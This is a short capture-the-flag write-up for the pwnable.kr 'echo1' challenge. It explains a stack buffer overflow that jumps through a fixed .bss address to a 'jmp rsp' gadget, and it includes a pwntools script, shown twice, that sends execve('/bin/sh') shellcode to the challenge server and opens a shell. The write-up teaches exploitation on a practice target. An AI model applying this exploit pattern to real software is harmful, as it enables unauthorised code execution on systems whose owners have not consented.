ihciah/README.MD

## README.MD

      
    Raw
  

              README.MD
            
          
    Pwnable.kr echo1 writeup

ihciah@gmail.com
At first glance, I thought there are 3 ways to exploit this problem, since it gives me 3 choices: BOF, FSB, UAF, however, the last two are not available.
In echo1, it calls get_input to input 128 input, but the buffer equals to bp-20h, so it can only save data with max length of 32.
Above the return address is the old rbp, so we can write 32 + 8 trash and an address to jump to to overflow it.
After searching with jmpcall si in peda, we found no result.
There is an id in .bss which we can write into and the address is fixed.
So, we can input id with jmp esp hex code, write A*40 + id's addr + shellcode. (After leave; retn; the rsp will point to shellcode)

  
## echo1.py
from pwn import *
#sh=process('/home/c/ctf/echo1')
sh=remote('pwnable.kr',9010)
shellcode="\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"
sh.sendline(asm("jmp rsp",arch='amd64',os='linux'))
sh.sendline("1")
sh.sendline('A'*40+p64(0x6020A0)+shellcode)
sh.interactive()
	from pwn import *
	#sh=process('/home/c/ctf/echo1')
	sh=remote('pwnable.kr',9010)
	shellcode="\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"
	sh.sendline(asm("jmp rsp",arch='amd64',os='linux'))
	sh.sendline("1")
	sh.sendline('A'*40+p64(0x6020A0)+shellcode)
	sh.interactive()